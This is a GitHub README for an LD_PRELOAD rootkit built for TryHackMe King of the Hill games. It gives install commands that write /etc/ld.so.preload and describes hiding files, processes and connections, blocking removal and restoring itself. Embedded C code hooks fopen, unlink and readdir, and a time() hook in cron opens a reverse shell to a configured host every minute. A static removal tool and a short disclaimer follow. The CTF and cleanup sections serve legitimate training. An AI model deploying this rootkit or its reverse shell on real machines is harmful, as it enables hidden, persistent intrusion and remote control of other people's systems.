ld preload rootkit for tryhackme king of the hill games

0xarnout/kingkit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

26 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Kingkit is an LD_PRELOAD rootkit designed for King of the Hill (KOTH) games on TryHackMe.

usage

Compile the rootkit with:

gcc kingkit.c -shared -fPIC -ldl -o kingkit.so

Then you can install the rootkit with:

cp ./kingkit.so /lib/kingkit.so
echo "/lib/kingkit.so" > /etc/ld.so.preload

The library has to be built against the same glibc the target uses, so compile it on a KOTH machine rather than on your own box. A library built against a different glibc version may fail to load, and when a preload entry fails to load, ld.so prints a warning for every dynamically linked program it starts, which is rather conspicuous. The easiest option is to compile on the Food machine, which is also available as a room of its own; the kingkit.so you build there can be used on all KOTH machines. Also make sure to change the KING_NAME macro to your own nickname before compiling.

features

  • Protects king.txt and writes KING_NAME into it
  • Redirects writes to /etc/ld.so.preload to FAKE_PRELOAD
  • Protects the rootkit library and FAKE_PRELOAD
  • Hides files and directories whose names start with HIDE_PREFIX
  • Reverse shell persistence
  • Hides processes and connections from netstat, ps and lsof
  • Automatically restores the library after it is deleted
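The usage and feature list above describe what the library does without showing how an LD_PRELOAD hook is written. The following is an added illustration, not kingkit.c: a minimal library with three hooks (fopen, unlink, readdir) that implement the write redirection, file protection and prefix hiding from the list. Each hook carries the same name as the libc symbol, looks up the real implementation with dlsym(RTLD_NEXT, ...) and forwards to it after applying its policy. The macro values (HIDE_PREFIX, FAKE_PRELOAD, the king.txt path) are placeholders chosen here and kingkit's real values may differ; it builds with the same gcc line as the README gives.

```c
/* Added example, not kingkit's own source: a minimal LD_PRELOAD library that
 * implements the file-side tricks from the feature list. Macro values are
 * placeholders. Build: gcc hooks.c -shared -fPIC -ldl -o hooks.so */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

#ifndef RTLD_NEXT               /* glibc's value, in case _GNU_SOURCE was not seen early enough */
#define RTLD_NEXT ((void *) -1l)
#endif

#define HIDE_PREFIX  "kk_"                /* assumed value */
#define FAKE_PRELOAD "/tmp/kk_preload"    /* assumed: decoy that receives redirected writes */
#define REAL_PRELOAD "/etc/ld.so.preload"
#define SELF_LIB     "/lib/kingkit.so"
#define KING_FILE    "/root/king.txt"     /* assumed path of king.txt */

/* ---- policy helpers, free of side effects so they can be unit-tested ---- */

/* Directory entries starting with HIDE_PREFIX never reach ls, find, etc. */
int should_hide(const char *name)
{
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Files a defender must not be able to unlink through a hooked libc. */
int is_protected(const char *path)
{
    return strcmp(path, SELF_LIB) == 0 || strcmp(path, KING_FILE) == 0 ||
           strcmp(path, REAL_PRELOAD) == 0 || strcmp(path, FAKE_PRELOAD) == 0;
}

/* Where a write-mode open of `path` really goes: the decoy for the real preload
 * file (so `echo > /etc/ld.so.preload` "succeeds" without effect), NULL (deny)
 * for the library and king.txt, and the path itself for everything else. */
const char *resolve_write(const char *path)
{
    if (strcmp(path, REAL_PRELOAD) == 0) return FAKE_PRELOAD;
    if (strcmp(path, SELF_LIB) == 0 || strcmp(path, KING_FILE) == 0) return NULL;
    return path;
}

static int mode_writes(const char *mode)
{
    return strpbrk(mode, "wa+") != NULL;
}

/* ---- the hooks: same name as the libc symbol, forward to the real one via RTLD_NEXT ---- */

FILE *fopen(const char *path, const char *mode)
{
    static FILE *(*real)(const char *, const char *) = NULL;
    if (!real) real = (FILE *(*)(const char *, const char *)) dlsym(RTLD_NEXT, "fopen");
    if (mode_writes(mode)) {
        path = resolve_write(path);
        if (!path) { errno = EPERM; return NULL; }
    }
    return real(path, mode);
}

int unlink(const char *path)
{
    static int (*real)(const char *) = NULL;
    if (!real) real = (int (*)(const char *)) dlsym(RTLD_NEXT, "unlink");
    if (is_protected(path)) { errno = EPERM; return -1; }
    return real(path);
}

struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real)(DIR *) = NULL;
    struct dirent *ent;
    if (!real) real = (struct dirent *(*)(DIR *)) dlsym(RTLD_NEXT, "readdir");
    /* skip entries that match the prefix; the caller only ever sees the rest */
    while ((ent = real(dirp)) != NULL && should_hide(ent->d_name))
        ;
    return ent;
}
```

This is enough to hide prefixed files from a plain readdir loop and to swallow a naive echo into /etc/ld.so.preload, but tools call whichever libc entry point they were built against: coreutils compiled with 64-bit file offsets use readdir64 and fopen64, rm goes through unlinkat, and many programs open files with open/openat rather than fopen, so a complete rootkit hooks those as well. Hiding from ps, netstat and lsof comes down to the same idea applied to what those tools read from /proc.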

reverse shell

The rootkit can spawn a reverse shell every minute by hooking the time() function, which the cron daemon calls regularly. To use this feature, set the HOST and PORT macros to your VPN IP address and the port your listener (netcat or a similar tool) is waiting on. Because /etc/ld.so.preload is only consulted when a process starts, cron has to be restarted so that it loads the rootkit: run systemctl restart cron on the box after the rootkit is installed.
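The part the paragraph leaves implicit is that the same library is preloaded into every process, so a time() hook has to decide on its own when it is running inside cron and how often it may act. The following is an added example, not kingkit's code: a time() hook that checks the calling process's name, throttles itself to one trigger per INTERVAL, and double-forks a connect-back shell. HOST, PORT and the cron process name are placeholder values you would replace with your VPN address, your listener port and the comm name on the target.

```c
/* Added example, not kingkit's own source: a time() hook that, when loaded into
 * cron, fires a connect-back shell at most once per minute. HOST, PORT and
 * CRON_COMM are placeholders. Build: gcc timehook.c -shared -fPIC -ldl -o timehook.so */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <dlfcn.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)
#endif

#define HOST      "10.8.0.2"   /* assumed: your VPN address */
#define PORT      4444         /* assumed: listener port */
#define CRON_COMM "cron"       /* assumed: /proc/self/comm of the cron daemon */
#define INTERVAL  60           /* seconds between connect-backs */

/* Pure trigger policy: fire only inside cron, and not more than once per INTERVAL.
 * `last` carries the timestamp of the previous trigger (0 = never). */
int should_fire(const char *comm, time_t now, time_t *last)
{
    if (strcmp(comm, CRON_COMM) != 0) return 0;
    if (*last != 0 && now - *last < INTERVAL) return 0;
    *last = now;
    return 1;
}

/* Name of the current process as the kernel reports it. */
static void read_comm(char *buf, size_t len)
{
    FILE *f = fopen("/proc/self/comm", "r");
    buf[0] = '\0';
    if (!f) return;
    if (fgets(buf, (int) len, f)) buf[strcspn(buf, "\n")] = '\0';
    fclose(f);
}

/* Grandchild side: connect to HOST:PORT and hand the socket to an interactive sh. */
static void connect_back(void)
{
    struct sockaddr_in sa;
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) _exit(1);
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(PORT);
    if (inet_pton(AF_INET, HOST, &sa.sin_addr) != 1 ||
        connect(s, (struct sockaddr *) &sa, sizeof sa) != 0)
        _exit(1);
    dup2(s, 0); dup2(s, 1); dup2(s, 2);
    execl("/bin/sh", "sh", "-i", (char *) NULL);
    _exit(1);
}

time_t time(time_t *tloc)
{
    static time_t (*real)(time_t *) = NULL;
    static time_t last = 0;
    int saved_errno = errno;          /* callers must not see our side effects in errno */
    char comm[32];
    time_t now;

    if (!real) real = (time_t (*)(time_t *)) dlsym(RTLD_NEXT, "time");
    now = real(tloc);

    read_comm(comm, sizeof comm);
    if (should_fire(comm, now, &last)) {
        pid_t pid = fork();
        if (pid == 0) {
            if (fork() == 0) connect_back();   /* grandchild does the work */
            _exit(0);                          /* child exits at once ... */
        }
        if (pid > 0) waitpid(pid, NULL, 0);    /* ... so cron never sees a stray zombie */
    }
    errno = saved_errno;
    return now;
}
```

The comm check is what keeps a library that is loaded into every process from opening a connection from every process; the throttle is what turns "cron calls time()" into "once a minute"; and the double fork hands the shell to init so that cron, which does not expect to reap children it never spawned, is left alone. Saving and restoring errno matters because the callers of time() do not expect it to change.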

remove LD_PRELOAD rootkits

While LD_PRELOAD rootkits are very powerful, they have a critical weakness: statically linked binaries never go through the dynamic loader, so they are not affected. To remove an LD_PRELOAD rootkit, all you need is a static binary that deletes the /etc/ld.so.preload file. Trying the same thing from a dynamically linked shell is unreliable against kingkit, since its hooks redirect writes to /etc/ld.so.preload to FAKE_PRELOAD and restore the library after it is deleted. To make things easier for you, this repository already includes a static binary that removes the /etc/ld.so.preload file; run it with:

chmod +x remove && ./remove

You can also compile it from source with:

gcc remove.c -static -o remove

Apart from the /etc/ld.so.preload file, the LD_PRELOAD environment variable can also be used to load the malicious library. Clear it with unset LD_PRELOAD; note that this only affects the current shell and does not undo whatever set the variable in the first place. Also keep in mind that the preload file is read when a process starts, so processes that loaded the library earlier keep it until they are restarted.
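The repository's remove.c is not shown on this page. As an added example that is not that file, here is a small static removal tool of the kind the paragraph describes: it reads /etc/ld.so.preload and lists every library it names (the file is a whitespace-separated list of shared-object paths), deletes it, and warns if LD_PRELOAD is set in its own environment. The PRELOAD_FILE path is the real one; the size limits are choices made here.

```c
/* Added example, not the repository's remove.c: a static tool that shows what
 * /etc/ld.so.preload is loading, deletes it, and reports whether its own
 * environment carries LD_PRELOAD. Build: gcc remove.c -static -o remove */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PRELOAD_FILE "/etc/ld.so.preload"
#define MAX_ENTRIES  32     /* chosen here */
#define MAX_PATH     256    /* chosen here */

/* Split the preload file's contents into entries: a whitespace-separated list
 * of shared-object paths. Returns the number of entries stored in `out`. */
int parse_preload(const char *content, char out[][MAX_PATH], int max)
{
    const char *ws = " \t\r\n";
    int n = 0;
    while (n < max) {
        size_t len, keep;
        content += strspn(content, ws);          /* skip separators */
        if (*content == '\0') break;
        len = strcspn(content, ws);              /* length of this path */
        keep = len < MAX_PATH ? len : MAX_PATH - 1;
        memcpy(out[n], content, keep);
        out[n][keep] = '\0';
        n++;
        content += len;
    }
    return n;
}

/* Delete the preload file. A file that is already missing is the state we want. */
int remove_preload(const char *path)
{
    if (unlink(path) == 0 || errno == ENOENT) return 0;
    return -1;
}

/* 1 if LD_PRELOAD is set (and non-empty) in this process's environment. */
int env_preload_set(void)
{
    const char *v = getenv("LD_PRELOAD");
    return v != NULL && v[0] != '\0';
}

int main(void)
{
    char buf[4096], entries[MAX_ENTRIES][MAX_PATH];
    size_t got = 0;
    int i, n;
    FILE *f = fopen(PRELOAD_FILE, "r");

    if (f) {
        got = fread(buf, 1, sizeof buf - 1, f);
        fclose(f);
    }
    buf[got] = '\0';

    n = parse_preload(buf, entries, MAX_ENTRIES);
    for (i = 0; i < n; i++)
        printf("preloaded: %s\n", entries[i]);

    if (remove_preload(PRELOAD_FILE) != 0) {
        perror("unlink " PRELOAD_FILE);
        return 1;
    }
    printf("removed %s (%d entries were listed)\n", PRELOAD_FILE, n);

    if (env_preload_set())
        printf("warning: LD_PRELOAD is set in this environment; run `unset LD_PRELOAD`\n");
    return 0;
}
```

Because everything here happens inside a static binary, none of the rootkit's hooks run, so write redirection and file protection cannot interfere with the unlink. Listing the entries first tells you which library files to go after next, since the preload file only points at them; deleting the file alone leaves the library on disk and leaves it loaded in every process that started while the file existed.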

resources about LD_PRELOAD rootkits

Note

I am not responsible for any damage caused by this tool; make sure you understand what you are doing and use this tool for educational purposes only.
